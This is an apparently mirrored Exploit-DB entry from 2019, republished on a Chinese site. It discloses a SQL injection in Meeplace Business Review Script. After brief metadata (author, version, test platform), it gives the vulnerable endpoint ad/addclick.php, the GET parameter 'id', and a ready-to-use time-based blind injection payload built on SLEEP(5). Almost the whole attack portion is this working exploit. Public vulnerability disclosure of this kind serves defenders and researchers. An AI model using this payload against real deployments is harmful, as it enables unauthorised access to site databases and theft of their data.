Meeplace Business Review Script – ‘id’ SQL Injection - 体验盒子

作者： Ahmet Ümit BAYRAM

日期： 2019-03-22

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/46592/

# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)